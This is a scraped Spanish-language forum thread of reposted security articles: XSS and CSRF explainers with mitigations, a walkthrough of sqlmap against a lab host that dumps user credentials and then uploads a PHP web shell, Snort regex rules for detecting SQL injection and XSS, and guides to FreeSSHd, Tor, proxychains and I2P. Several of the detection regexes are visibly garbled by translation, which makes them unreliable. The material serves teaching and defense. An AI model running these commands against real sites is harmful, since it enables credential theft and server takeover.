Indirecto o reflejado. Funciona modificando valores que la aplicación web pasa de una página a otra, sin emplear sesiones. Sucede cuando se envía un mensaje o ruta en una URL, una cookie o en la cabecera HTTP (pudiendo extenderse al DOM del navegador).

Consideraciones

Como desarrollador


La aplicación web que se desee implementar debe contar con un buen diseño. Posteriormente, se deben realizar diversos tipos de pruebas antes de su liberación, para detectar posibles fallos y  huecos de seguridad, mediante el empleo de alguna herramienta automatizada. También, es conveniente proporcionar mantenimiento a la aplicación y estar actualizado en las versiones de las herramientas que se emplean para su puesta en marcha.

Algunas recomendaciones para mitigar el problema, son:

Emplear librerías verificadas o algún framework que ayude a disminuir el inconveniente. Por ejemplo: la librería anti-XSS de Microsoft, el módulo ESAPI de codificación de OWASP, Apache Wicket, entre otros.

Entender el contexto en el cual los datos serán usados y la codificación de los mismos, este aspecto es importante cuando se envían datos de un componente a otro de la aplicación o cuando se deben enviar a otra aplicación.

Conocer todas las áreas potenciales donde las entradas no verificadas pueden acceder al software: parámetros o argumentos, cookies, información de la red, variables de entorno, resultados de consultas, búsqueda de DNS reversible, peticiones enviadas en las cabeceras, componentes de la URL, correos electrónicos, archivos, nombres de archivo, bases de datos o algún sistema externo que proporcione información a la aplicación.

Las validaciones de datos de entrada, deben realizarse siempre del lado del servidor, no sólo en el lado del cliente. Los atacantes pueden evitar la validación realizada del lado del cliente modificando valores antes de realizar verificaciones o remover por completo esta validación.

En caso de ser posible, emplear mecanismos automatizados para separar cuidadosamente los datos del código fuente: revisión de comillas, codificación y validación automática que muchas veces se escapan al desarrollador.

Por cada página web generada, se recomienda emplear una codificación determinada de caracteres, ya que si no se especifica, el navegador puede dar un trato diferente a ciertas secuencias de caracteres especiales, permitiendo la apertura del cliente a posibles ataques.

Para mitigar el problema de ataque contra el uso de cookies, es conveniente indicar que tiene el formato de HttpOnly. En los navegadores que lo soportan, puede prevenirse que la cookie sea usada por scripts maliciosos desde el lado del cliente.

Se debe emplear una estrategia de validación de las entradas: rechazar aquellas que no cumplan con lo especificado, limpiar las que sean necesarias. Al validar, considérense  las características de cada entrada: longitud, tipo de dato, rango de valores aceptados, entradas perdidas o adicionales, sintaxis, consistencia con otras entradas proporcionadas y seguimiento de las reglas del negocio.

Cuando se construyan páginas web de forma dinámica (generadas de acuerdo a las entradas o solicitudes de los usuarios), es recomendable usar listas blancas estrictas. Todas las entradas deben ser limpiadas y validadas, incluidos cookies, campos ocultos, cabeceras y la propia dirección.

Cuando una cantidad aceptable de objetos, como nombres de archivo o URL es limitada o conocida, es conveniente crear una conjunto de asignaciones de valores de entrada fijo a los nombres de archivo o URL y rechazar todos los demás.

Se recomienda usar un firewall de aplicaciones capaz de detectar ataques cuando el código se genere dinámicamente, como medida de prevención, debe complementarse con otras para proporcionar defensa en profundidad.

Como Administrador de Bases de Datos

Así como el desarrollador debe validar las entradas proporcionadas por parte del usuario, el encargado de diseñar e implementar la base de datos debe considerar la seguridad de la misma, pues en ella se guarda la información proporcionada por los usuarios y es manipulada mediante la aplicación web. Los datos que serán almacenados, también pueden ser validados mediante el uso de constraints  (restricciones aplicables a los objetos de una base de datos: unique, default, not null, check) que restringen la entrada para cada campo.

PDF XSS


Es una vulnerabilidad ampliamente usada para afectar el Acrobat Reader de Adobe. En este caso, si se abusa de las características para abrir archivos en Acrobat, un sitio bien protegido se vuelve vulnerable a un ataque de tipo XSS si da alojamiento a documentos en formato PDF.

Esto afecta seriamente, a menos que se actualice el Reader o se cambie la forma en que el navegador maneja dichos documentos.

Una manera de combatirlo, si se cuenta con el servidor de aplicaciones web Apache, es llevar a cabo la correcta configuración de ModSecurity, ya que cuenta con directivas de protección para archivos en formato PDF.

XSRF

Un ataque Cross-Site Request Forgery (XSRF ó también CSRF) explota la confianza que un usuario tiene hacia las entradas proporcionadas por un sitio.

Por ejemplo: un usuario se encuentra autenticado y navegando en un sitio, en ese momento un atacante obtiene el control de su navegador, con él realiza una solicitud a una tarea de una URL válida del sitio, por lo que el atacante tendrá acceso como si fuera el usuario previamente registrado.

Distintivamente, un atacante intercalará código HTML o JavaScript malicioso en un correo o en una tarea específica accesible desde una URL, que se ejecuta ya sea directamente o empleando un error de tipo XSS. También, es posible realizar inyección a través de lenguajes como el BBCode. Este tipo de ataques son difíciles de detectar.

Muchas de las funcionalidades de un sitio web son susceptibles de uso durante un ataque XSRF. Esto incluye información enviada tanto por GET como por POST.

También puede usarse como vector para explotar vulnerabilidades de tipo XSS en una aplicación. Ejemplos de ello son: una vulnerabilidad de tipo XSS en un foro donde un atacante puede obligar al usuario a publicar –sin que éste se dé cuenta- un gusano informático. Un atacante puede también usar XSRF para transmitir un ataque a algún sitio de su elección, así como realizar un DDos.

Sin embargo, las formas más comunes de realizar este tipo de ataque consisten en usar la etiqueta HTML o el objeto JavaScript empleados para imágenes. Distintivamente, el atacante infiltrará un email o sitio web en ellos, así cuando el usuario cargue la página o el correo electrónico, también estará realizando la petición a la URL que haya colocado el atacante.

Un atacante puede instalar su script dentro de un documento de Word, un archivo de flash, un clip de video, redifusión web RSS o Atom, o algún otro tipo de formato que pueda alojar el script.

Si un sitio web permite ejecutar sus funciones empleando una URL estática o peticiones POST, es posible que sea vulnerable, si la función se lleva a cabo mediante la petición GET, el riesgo es mayor. Si se realizan las mismas funciones,  de la misma forma repetidamente, entonces la aplicación puede ser vulnerable.

Un ataque XSRF no puede evitarse mediante la verificación del referer de las cabeceras de la petición realizada, ya que puede "limpiarse" o modificarse mediante algún tipo de filtro. Las cabeceras pueden falsearse usando XMLHTTP, por ejemplo.

Una de las soluciones más conocidas, consiste en adjuntar un token no predecible y cambiante a cada petición. Es importante que el estado de éste vaya asociado con la sesión del usuario, de otra manera un atacante puede adjuntar su propio token válido y emplearlo en su beneficio. Adicionalmente, al ligarlo a la sesión del usuario es importante limitar el periodo durante el cual será válido.

Referencias.


   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#32
Debates, Reviews y Opiniones / Re:[WP] SQLi || XSS
Enero 22, 2017, 03:24:26 PM
Que Es Ataque XSS

¿Cómo funciona un XSS?

En primer lugar es importante tener en cuenta que con esta vulnerabilidad, los atacantes explotan la confianza que un usuario tiene en un sitio en particular, y esto nos da una dimensión del impacto que puede tener.

Este tipo de vulnerabilidad puede ser explotada de dos maneras: de forma reflejada y de forma almacenada. A continuación, haré una breve explicación de cada una.

    Reflejada

Consiste en modificar valores que la aplicación web usa para pasar variables entre dos páginas. Un clásico ejemplo de esto es hacer que a través de un buscador se ejecute un mensaje de alerta en JavaScript. Con XSS reflejado, el atacante podría robar las cookies para luego robar la identidad, pero para esto, debe lograr que su víctima ejecute un determinado comando dentro de su dirección web.

Para esto, los cibercriminales suelen enviar correos engañosos para que sus víctimas hagan clic en un enlace disfrazado y así se produzca el robo.

    Almacenada


Consiste en insertar código HTML (programación web) peligroso en sitios que lo permitan; de esta forma quedará visible a los usuarios que ingresen en el sitio modificado.
¿Qué significa que un sitio web es vulnerable a XSS?

Si un sitio web contiene esta vulnerabilidad, un atacante puede realizar diversos tipos de ataques basándose en la confianza que inspira la plataforma en el usuario. Desde redirigir a otro sitio para robar información mediante phishing, hasta hacer que se descargue alguna amenaza y se ejecute en el sistema.

En última instancia, un Cross-site Scripting puede volver peligroso para sus usuarios a un sitio legítimo.
¿Por qué o como se produce esta vulnerabilidad?

Normalmente se debe a la falta o poca frecuencia de los controles necesarios en el sitio, pensados para evitar la ejecución de comandos desde la misma página web. A raíz de esto, un ciberdelincuente puede lograr ejecutar scripts (pequeños programas) en lenguajes como Java Script o HTML, entre otros.

Los scripts son una serie de instrucciones a ejecutar, que pueden estar programados en Java, HTML o cualquier otro lenguaje siempre y cuando el entorno donde se vaya a ejecutar sea compatible. Si bien el uso de scripts ayuda a automatizar muchas tareas a los administradores, también son utilizados por atacantes para automatizar sus ataques, haciendo que estos pequeños programas trabajen por sí solos robando información cuando la víctima accede al sitio vulnerado.
XSS en la práctica

Para comprender cómo funciona, lo trasladaremos a una situación que puede ser cotidiana a modo de ejemplo. Suponemos el siguiente escenario:

    Por un lado, el servidor "A" que pertenece a "mibanco.com", el cual es vulnerable a XSS
    Por el otro lado, un atacante que consigue inyectar código malicioso en "mibanco.com" mediante la explotación de XSS. El código que inyecta hace que, una vez que el usuario accede, sea enviado a otro sitio web exactamente igual a "mibanco.com"
    El usuario víctima accede desde su navegador a "mibanco.com"; sin embargo, al ejecutar el código malicioso inyectado por el atacante (sin saberlo), estará registrando sus datos en sitio clon del original. Por supuesto que esto compromete por completo su información financiera

Este solo es un ejemplo de una de las consecuencias de esta falta de controles, aunque también podría pasar que el sitio descargue malware o algún tipo de exploit que se aproveche de alguna vulnerabilidad en el sistema de su víctima, para lograr obtener acceso a su equipo personal.
¿Cómo puedes evitar ser víctima de XSS?

En primer lugar es fundamental, como siempre mencionamos, que cuentes con una solución de seguridad instalada y actualizada. Esto es importante ya que ante la ejecución de alguna aplicación maliciosa sin tu consentimiento, tal como malware o exploits, automáticamente será bloqueada.

Además, si se trata de una redirección a algún sitio de phishing, se cuenta con la protección del antivirus y el bloqueo proactivo por parte de los navegadores.

En segundo lugar, es muy importante que estés siempre atento a dónde ingresas: siempre es bueno mirar la dirección URL a la que se está accediendo. Ya hemos visto ejemplos de esto, como por ejemplo las redirecciones de Facebook, que pueden ser aprovechadas por atacantes, si no se tienen en cuenta algunos consejos, como ya hemos visto anteriormente, aquí dejamos 7 consejos para todos aquellos que les guste explorar Internet.

Por otro lado, existen complementos para los navegadores que se encarga de bloquear estos scripts en sitios web. Uno de ellos es NoScript, que permite realizar configuraciones personalizadas (y es gratuito).

Finalmente, nunca es una mala opción utilizar navegadores alternativos, quizás no tan populares, como Opera, Comodo o Chromium, entre otros. De esta forma, si un atacante lanza un ataque que intenta explotar alguna vulnerabilidad en uno de los navegadores más conocidos a través de un exploit, al no cumplirse las condiciones para la explotación exitosa de la vulnerabilidad, esto denegará el acceso al sistema.

A veces algunas de estas vulnerabilidades exceden a los usuarios, ya que puede tratarse de un problema que no se resuelve instalando actualizaciones en el equipo. Por otra parte, para resolver este tipo de cuestiones, es necesario que el administrador del sitio agregue los controles necesarios, para que nada pueda ser modificado por un tercero.

Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#33
Debates, Reviews y Opiniones / Re:[WP] SQLi || XSS
Enero 22, 2017, 03:22:57 PM
Cómo funciona SQL Injection, seguro eres vulnerable

Las vulnerabilidades más comunes en aplicaciones web según la OWASP (Open Web Application Security Project) son las de tipo inyección, a través de estas un usuario malintencionado puede enviar comandos o consultas con el fin de obtener datos o realizar ciertas acciones.

SQL Injection es una vulnerabilidad que permite a un atacante realizar consultas a una base de datos, se vale de un incorrecto filtrado de la información que se pasa a través de los campos y/o variables que usa un sitio web, es por lo general usada para extraer credenciales y realizar accesos ilegítimos, práctica un tanto neófita, ya que un fallo de este tipo puede llegar a permitir ejecución de comandos en el servidor, subida y lectura de archivos, o peor aún, la alteración total de los datos almacenados.

Una vulnerabilidad de tipo SQL Injection puede ser explotada tanto a través del método GET como del método POST. La práctica más común es hacerlo a través del primero, sin embargo hacerlo a través del método POST puede llegar a devolver los mismos resultados. En el mundo de la seguridad informática quienes descubren o investigan vulnerabilidades suelen hacer scripts que automatizan la explotación de las mismas, para el caso de SQL Injection las más comunes son:

    Sqlmap: Tal vez la más famosa, desarrollada en python por Bernardo Damele y Miroslav Stampar.
    Havij: Desarrollada por la empresa ITSecTeam.
    SqlNinja: Desarrollada en Perl, usada para explotar aplicaciones web que usan como back-end a Microsoft Sql Server.

Cómo es un ataque a una aplicación web vulnerable

Vamos a realizar un ataque a una aplicación web vulnerable, la forma más común de encontrar errores es a través del uso de una comilla (caracter de escape) en un input, para este caso una variable que se envía por GET:



l probar poner la comilla junto al parámetro que se está enviando a la base de datos y ejecutarse la consulta deforme tenemos como resultado un error de sintaxis SQL, lo que nos está indicando la no validación de la sentencia y por tanto la vulnerabilidad.



Para explotarla usaremos Sqlmap ya que el proceso manual puede llegar a convertirse en algo tedioso y en ocasiones muy prolongado. Para usar esta herramienta debemos tener instalado Python, en nuestro caso estamos trabajando sobre Bugtraq 2, una distribución de seguridad informática que tiene instalado por defecto lo que necesitamos.

Lo primero que haremos es pedirle a sqlmap que nos revele qué bases de datos la aplicación web está usando a través del comando --dbs, no sin antes indicarle a través de -u la url con el parámetro vulnerable:

Código: php

Código :

python sqlmap.py -u "http://192.168.1.37/cat.php?id=1" --dbs




Una vez tenemos la base de datos necesitamos saber qué tablas tiene:

Código :

Código: php
python sqlmap.py -u "http://192.168.1.37/cat.php?id=1" -D photoblog --tables




Y en el árbol descendente lo siguiente son las columnas:

Código :
Código: php

python sqlmap.py -u "http://192.168.1.37/cat.php?id=1" -D photoblog -T users --columns




Y la línea que nos dará las credenciales de los "users" registrados:

Código :

Código: php
python sqlmap.py -u "http://192.168.1.37/cat.php?id=1" -D photoblog -T users -C login,password --dump


Sqlmap detecta que al hacer el dump las "password" están encriptadas en MD5 por lo que propone descifrar, aceptamos que lo haga y voila!


Accedemos a la sección "admin" de nuestra aplicación y nos encontramos un upload de imágenes, probamos subiendo una shell PHP que nos pueda dar acceso al servidor y permita ejecutar comandos, listar directorios y archivos e incluso hacer escalaciones de privilegios o ataques Symlink.




Se ha bypasseado el filtro, ahora solo resta ir al index del sitio, buscar el link de la shell en el código y acceder:


pwned!, con tan solo explorar las opciones nos daremos cuenta de lo que podemos hacer en el servidor:



Fuente No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#34
Debates, Reviews y Opiniones / Re:[WP] SQLi || XSS
Enero 22, 2017, 03:17:35 PM
Detección de ataques de inyección de SQL y de secuencias de comandos entre sitios

Introducción

En los últimos años, los ataques contra la capa de aplicación web han requerido una mayor atención por parte de los profesionales de seguridad. Esto se debe a que no importa cuán fuertes sean tus conjuntos de reglas de firewall o cuán diligente sea tu mecanismo de revisión, si tus desarrolladores de aplicaciones Web no han seguido prácticas seguras de codificación, los atacantes entrarán directamente a tus sistemas a través del puerto 80. Las dos principales técnicas de ataque Han sido ampliamente utilizados son los ataques SQL Injection [ref 1] y Cross Site Scripting [ref 2]. SQL Injection se refiere a la técnica de insertar meta-caracteres SQL y comandos en campos de entrada basados ​​en Web para manipular la ejecución de las consultas SQL de back-end. Se trata de ataques dirigidos principalmente contra el servidor Web de otra organización. Los ataques de Cross Site Scripting funcionan incrustando etiquetas de scripts en URLs y atrayendo a usuarios desprevenidos para hacer clic en ellos, asegurándose de que el Javascript malicioso se ejecute en la máquina de la víctima. Estos ataques aprovechan la confianza entre el usuario y el servidor y el hecho de que no hay validación de entrada / salida en el servidor para rechazar caracteres Javascript.

En este artículo se describen técnicas para detectar ataques SQL Injection y Cross Site Scripting (CSS) contra sus redes. Ha habido mucha discusión sobre estas dos categorías de ataques basados ​​en Web sobre cómo llevarlos a cabo, su impacto y cómo prevenir estos ataques usando mejores prácticas de codificación y diseño. Sin embargo, no hay suficiente discusión sobre cómo estos ataques pueden ser detectados. Tomamos el popular IDS de código abierto Snort [ref 3], y componemos reglas de expresión regular basada en la detección de estos ataques. Incidentalmente, el conjunto de reglas por defecto en Snort contiene firmas para detectar secuencias de comandos entre sitios, pero éstas pueden evadirse fácilmente. La mayoría de ellos pueden ser eludidos mediante el uso de valores hexadecimales de cadenas como% 3C% 73% 63% 72% 69% 70% 74% 3E en lugar de <script>.

Hemos escrito múltiples reglas para detectar el mismo ataque dependiendo del nivel de paranoia de la organización. Si desea detectar todos y cada uno de los posibles ataques de Inyección de SQL, entonces simplemente tendrá que prestar atención a cualquier ocurrencia de meta-caracteres SQL, como la comilla simple, el punto y coma o el doble guión. Del mismo modo, una forma paranoica de comprobar los ataques CSS sería simplemente mirar hacia fuera para los corchetes angulados que significan una etiqueta HTML. Pero estas firmas pueden resultar en un alto número de falsos positivos. Para evitar esto, las firmas pueden modificarse para que sean precisas, sin embargo, no producen demasiados falsos positivos.

Cada una de estas firmas puede usarse con o sin otros verbos en una firma de Snort usando la palabra clave pcre [ref 4]. Estas firmas también se pueden usar con una utilidad como grep para pasar por los registros del servidor Web. Pero la advertencia es que la entrada de usuario está disponible en los registros del servidor Web sólo si la aplicación utiliza solicitudes GET. Los datos sobre solicitudes POST no están disponibles en los registros del servidor Web.

Expressiones regulares para la inyección de SQL

Un punto importante a tener en cuenta al elegir su expresión regular (s) para detectar ataques de inyección de SQL es que un atacante puede inyectar SQL en la entrada tomada de un formulario, así como a través de los campos de una cookie. Su lógica de validación de entrada debe considerar cada tipo de entrada que se origina desde el usuario - ya sea campos de formulario o información de cookies - como sospechoso. También si descubre demasiadas alertas procedentes de una firma que busca una comilla simple o un punto y coma, puede ser que uno o más de estos caracteres sean entradas válidas en las cookies creadas por su aplicación web. Por lo tanto, tendrá que evaluar cada una de estas firmas para su aplicación web en particular.

Como se mencionó anteriormente, una expresión regular trivial para detectar ataques de inyección SQL es observar los meta-caracteres específicos de SQL, como el single-quote (') o el doble guión (-). Con el fin de detectar estos caracteres y sus equivalentes hex, la siguiente expresión regular puede ser utilizado:

Regex for detection of SQL meta-characters
/(\%27)|(\')|(\-\-)|(\%23)|(#)/ix

Explanation:
We first detect either the hex equivalent of the single-quote, the single-quote itself or the presence of the double-dash. These are SQL characters for MS SQL Server and Oracle, which denote the beginning of a comment, and everything that follows is ignored. Additionally, if you're using MySQL, you need to check for presence of the '#' or its hex-equivalent. Note that we do not need to check for the hex-equivalent of the double-dash, because it is not an HTML meta-character and will not be encoded by the browser. Also, if an attacker tries to manually modify the double-dash to its hex value of %2D (using a proxy like Achilles [ref 5]), the SQL Injection attack fails.

The above regular expression would be added into a new Snort rule as follows:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection - Paranoid"; flow:to_server,established;uricontent:".pl";pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)

In this case, the uricontent keyword has the value ".pl", because in our test environment, the CGI scripts are written in Perl. Depending upon your particular application, this value may be either ".php", or ".asp", or ".jsp", etc. From this point onwards, we do not show the corresponding Snort rule, but instead only the regular expressions that are to be used for creating these rules. From the regular expressions you can easily create more Snort rules.

In the previous regular expression, we detect the double-dash because there may be situations where SQL injection is possible even without the single-quote [ref 6]. Take, for instance, an SQL query which has the where clause containing only numeric values. Something like:

select value1, value2, num_value3 from database
where num_value3=some_user_supplied_number


In this case, the attacker may execute an additional SQL query, by supplying an input like:

3; insert values into some_other_table

Finally, pcre modifiers 'i' and 'x' are used in order to match without case sensitivity and to ignore whitespaces, respectively.

The above signature could be additionally expanded to detect the occurrence of the semi-colon as well. However, the semi-colon has a tendency to occur as part of normal HTTP traffic. In order to reduce the false positives from this, and also from any normal occurrence of the single-quote and double-dash, the above signature could be modified to first detect the occurrence of the = sign. User input will usually occur as a GET or a POST request, where the input fields will be reflected as:

username=some_user_supplied_value&password=some_user_supplied_value


Therefore, the SQL injection attempt would result in user input being preceded by a = sign or its hex equivalent.

Regex modificado para la detección de meta-caracteres SQL

(\% 3B) | (\)) / i (\% 3)

Explicación:
Esta firma busca primero el signo = o su equivalente hexadecimal (% 3D). A continuación, admite cero o más no caracteres de nueva línea y, a continuación, comprueba para la comilla simple, el doble guión o el punto y coma.

Regex para ataque típico de inyección de SQL
/ \ W * ((\% 27) | (\ ')) / (%%))

Explicación:
\ W * - cero o más caracteres alfanuméricos o subrayados
(\% 27) | \ '- la cita única omnipresente o su equivalente hexadecimal
(\% 6F) | o | (\% 4F)) (\% 72) | r | (\% 52) - la palabra 'o' con varias combinaciones de sus equivalentes de mayúsculas y minúsculas.

El uso de la consulta SQL 'union' también es común en los ataques de Inyección de SQL contra una variedad de bases de datos. Si la expresión regular anterior que sólo detecta los caracteres meta de una sola cotización u otros meta SQL da como resultado demasiados positivos falsos, puede modificar adicionalmente la consulta para comprobar específicamente la comilla única y la palabra clave 'unión'. Esto también se puede extender a otras palabras clave de SQL como 'select', 'insert', 'update', 'delete', etc.

Regex para detectar SQL Injection con la palabra clave UNION

/ ((\% 27) | (\ ')) union / ix
(\% 27) | (\ ') - la comilla simple y su equivalente hexadecimal
Union - la palabra clave union

Se pueden escribir expresiones similares para otras consultas SQL, tales como> seleccionar, insertar, actualizar, eliminar, omitir, etc.

Si, en esta etapa, el atacante ha descubierto que la aplicación Web es vulnerable a la inyección de SQL, intentará explotarla. Si se da cuenta de que la base de datos de back-end está en un servidor MS SQL, normalmente intentará ejecutar uno de los muchos procedimientos almacenados almacenados y extendidos. Estos procedimientos comienzan con las letras 'sp' o 'xp' respectivamente. Normalmente, intentaría ejecutar el procedimiento extendido 'xp_cmdshell', que permite la ejecución de comandos de shell de Windows a través de SQL Server. Los derechos de acceso con los que se ejecutarán estos comandos son los de la cuenta con la que se ejecuta SQL Server, normalmente Sistema local. Como alternativa, también puede intentar modificar el registro utilizando procedimientos como xp_regread, xp_regwrite, etc.
#35
Windows / Freesshd Windows SSH
Enero 21, 2017, 08:37:53 PM
El servidor SSH servirá para ejecutar cualquier comando en la consola de Windows (cmd.exe), aunque también podremos pasar archivos mediante SCP ya sea con comandos o a través de WinSCP (recomendado), el cliente SSH que usaremos será Putty o la consola de cualquier GNU/Linux.

El servidor SFTP servirá para pasar archivos por internet y en LAN de forma segura, cifrando todo el tráfico, en el ejemplo que os pondré, usaré WinSCP que también es compatible con SFTP, es un programa fundamental que no debe faltar en vuestros equipos.

Descarga de FreeSSHd e instalación

Lo primero que debemos hacer es descargarnos el programa FreeSSHd que será el que utilicemos. Puedes descargarlo desde su página web oficial:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

A continuación procedemos a instalarlo (clic derecho, ejecutar como administrador) y veréis la siguiente pantalla donde damos a SIGUIENTE.














Pinchamos en FINISH y finalizamos la instalación del programa.

Configuración de FreeSSHd

Ha llegado la hora de arrancar el servidor, ejecutamos el programa FreeSSHd con permisos de ADMINISTRADOR para configurarlo adecuadamente.

Cuando lo arranquemos, nos aparecerá esta pantalla:





hora elegimos un puerto para el servidor SSH, por defecto es el puerto 22, también permite tener un máximo de usuarios conectados simultáneamente, lo podemos dejar en 0 si queremos que sea ilimitado.

Como podéis ver, las claves RSA y DSA creadas, son de 1024 bits, podemos crear unas de 2048 bits (más seguras) a cambio de un menor rendimiento.



La forma más segura de conectarnos mediante SSH es con una llave pública para la autenticación, pero es muy pesado llevar dicha llave pública ya sea en un pendrive etc, por tanto sólo vamos a requerir un usuario y clave (que más adelante asignaremos).





Vamos a crear las cuentas de usuario en "Users", creamos un login y la clave, la opción del centro es para poner una clave de las de toda la vida (nada de certificados).



Este programa nos permite habilitar ciertas direcciones IPs para que sólo podamos acceder desde esa dirección en concreto (whitelist), o también permite seleccionar una lista negra para impedir el paso.



Ahora que ya tenemos todo configurado (no hace falta decir que le déis a aplicar, aceptar y guardar en cada una de las opciones para que se guarden).

Nos vamos a la pantalla principal y podemos iniciar el servidor (Click here to start it).



Probando el servidor con WinSCP


Iniciamos WinSCP y conectamos...






Conviene configurar el WinSCP para sólo establecer conexiones con SSH v.2 que es más seguro (aunque al elegir AES256 esta parte la hemos cubierto porque sólo podremos conectar mediante v.2).



Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#36
Ser anonimo "" en kali linux o derivados debian .


En primer lugar actualizaremos el sistema con el siguiente comando:
Código: php

sudo apt-get update && sudo apt-get upgrade


Esperaremos a que el sistema se actualice correctamente y una vez terminado el proceso, instalaremos Tor  desde sus repositorios oficiales tecleando:

Código: php
sudo apt-get install tor



Una vez finalizada la instalación, iniciamos el servicio:

Código: php
sudo service tor start


Y seguidamente comprobamos que se ha iniciado correctamente:
Código: php

sudo service tor status




Con Tor ya iniciado vamos a modificar el archivo de configuración de Proxychains, para ello teclearemos:
Código: php

    sudo nano /etc/proxychains.conf


En este archivo debemos realizar los siguientes cambios:

   * Des-comentar borrando el # la línea dynamic_chain
    *Comentar con un # la línea strict_chain
   * Añadir al final de archivo: socks5 127.0.0.1 9050






Después de esto ya tendremos instalado Tor y habremos configurado proxychains correctamente, lo que quiere decir que ya podremos navegar en anonimato con la ayuda de Tor.

Escribiremos proxychains, más el nombre de la herramienta que vayamos a utilizar para que todo el tráfico salga a través de Tor. Por ejemplo comprobemos que efectivamente la  dirección "IP" que estamos utilizando está ofuscada por la red Tor. Abrimos el navegador :

Código: php
proxychains iceweasel 


Y en la siguiente página podemos comprobar que la dirección que estamos utilizando no es nuestra dirección IP real:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

A partir de ahora, todo el tráfico que generemos en la ventana del navegador que hemos abierto con el comando anterior será totalmente anónimo (Si abrimos otra ventana diferente sin haber ejecutado la orden anterior, el navegador en este caso si utilizaría nuestra IP real).

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#37
Praticas para hacer anonimo ""

Proxys:
Podemos encontrar un amplio listado de webs que ofrecen direcciones de servidores proxy para ganar anonimato en internet, el objetivo de conectarte a través de una de estas máquinas es camuflar la dirección IP, en tal caso, cuando visitamos una página o nos conectamos a un servicio a través de un proxy el servidor remoto sólo ve la dirección IP de nuestro proxy, pero no nuestra IP real. Hay que tener en cuenta que no somos "invisibles" ya que el servidor proxy al que nos conectamos sí sabe cual es nuestra IP auténtica.

Tunel SSH:
Se trataría de crear un socket ssh para poder dirigir nuestro tráfico a otra máquina remota, dicha máquina es la que realizaría las conexiones a la web, así nuestra dirección IP original no llegaría a la página web. Para realizar este proceso con navegadores WEB como Mozilla Firefox o Google Chrome, necesitáis privoxy para enviar la información HTTP al socket SSH.

Red TOR: The Onion Router, uno de los métodos de anonimato en internet más usado actualmente, la red TOR está compuesta por varios servidores, por los cuales van rebotando las conexiones con el objetivo de hacer más difícil detectar la procedencia del visitante. Podemos descargarnos el paquete completo del browser aquí. Tan sólo necesitamos descomprimir y ejecutarlo (o en el caso de los usuarios de Windows: instalar y ejecutar).

ORBot (Android): Es el cliente TOR para teléfonos móviles, gracias a el podremos dirigir nuestro tráfico hacia la red TOR, ya sea por redes móviles o wifi. Aquí tenéis el enlace en la App Store de Google, aunque también podréis encontrarlo en otros markets como FDroid.

Privoxy:
Si intentamos conectar a tor algo que necesite HTTP, necesitaremos este software, es el encargado de montar el proxy HTTP que nos conecte con nuestro servidor TOR, aunque funcionaría con cualquier otro proxy, este complemento viene integrado en el paquete completo de tor browser, cuyo enlace está mas arriba, pero este software hace algo más que interconectarnos a la red tor, desde él podemos indicarle que cabeceras de navegadores queremos usar, o prevenir fugas de información de nuestro tráfico DNS.

I2P (Invisible Internet Project): Este software ofrece una capa de abstracción para comunicaciones entre dispositivos. Es software libre, por tanto no debemos preocuparnos por temas relacionados con licencias.
El software más usado y probado de I2p está escrito en java, pero existen dos versiones más del núcleo de la aplicación en C y C++. La versión java incluye además la consola del router donde se permite configurar la mayoría de las opciones de la red.

VPN: Los servicios VPN son uno de los más solicitados para los que buscan pagar por obtener una buena privacidad. Añade un salto como un proxy pero además ofrece la posibilidad de añadir una capa de cifrado a las conexiones que haga el cliente, suelen tener algoritmos muy robustos, AES, RSA... Hay que saber elegir proveedor ya que en determinados países llevan la privacidad más a rajatabla que otros, por tanto la elección de pais en ocasiones es fundamental para que nadie pueda pedir tus datos a la empresa de tu VPN.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#38
Anonimato en la Red: I2P y su instalación en GNU/Linux

I2P es un proyecto para construir, y mantener una red de comunicación segura y anónima, en la que todos los datos se envuelven en varias capas de cifrado (ElGamal/AES+SessionTags), mediante un sistema de distribución peer to peer, que está diseñado para correr cualquier tipo de servicio mediante su propia deep web: eepsites ( sitios web que están alojados de forma anónima en I2P y que sólo son accesibles desde este,), intercambio de archivos (Imule, I2PSnark,  I2Phex), mail (susimail), IRC, etc...


La red se compone de un conjunto de nodos ("routers") que forman tuneles virtuales unidireccionales entrantes y salientes, en el que cada cliente conectado contribuye a dar servicio a la red, permitiendo intercambio de información, sin que el emitente o el receptor o cualquiera de los nodos sean identificables.




A I2P se le compara habitualmente con TOR, pero tienen técnicas y filosofías distintas, mientras el objetivo principal de TOR es permitir el anonimato en internet, I2P está diseñado para construir una red segura con aplicaciones propias. Otra diferencia es el comportamiento a la hora de navegar: I2P suele ser más rápido, pero al ser construido en java, también demanda algo más de consumo.





La instalación es muy sencilla tan solo tenemos que tener instalado java en nuestra máquina, descargar el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , darle permisos de ejecución e instalarlo.

Código: php
java -jar i2pinstall_0.9.4.jar












Ahora que lo hemos instalado podemos iniciar el programa mediante

/home/user/i2p/i2prouter start

(sustituyendo user por tu usuario!!)



Automáticamente se nos abrirá esta dirección: 127.0.0.1:7657 en nuestro navegador predeterminado, dándonos la bienvenida y mostrándonos las opciones de configuración



Si pinchamos en Destinos Comunes, podremos gestionar los diversos túneles de entrada salida



Ahora solo nos falta configurar Firefox (o el navegador que utilicéis) para poder acceder a todos los servicios de I2P como eepsites, foros o aplicaciones. En mi caso como uso Firefox, voy a preferencias > avanzado > red y configuro el proxy


FINAL

Fuente:

    forum.i2p: foro de usuarios de I2P
    eepsites.i2p: un motor de busqueda de eepsites
    ugha.i2p: wiki de I2P
    echelon.i2p: repositorio de software.
#39
WHONIX



Whonix es un sistema operativo basado en Debian, diseñado en varias partes separadas, con el objetivo de que se ejecuten en diferentes máquinas virtuales de VirtualBox de forma simultánea, encima de nuestro sistema real.

Whonix consiste en dos partes principales:


    Whonix-Gateway: Una máquina virtual que posee salida a internet, ejecuta Tor y actúa completamente como gateway o "puerta de enlace", torificando todo lo que pase a través del sistema.
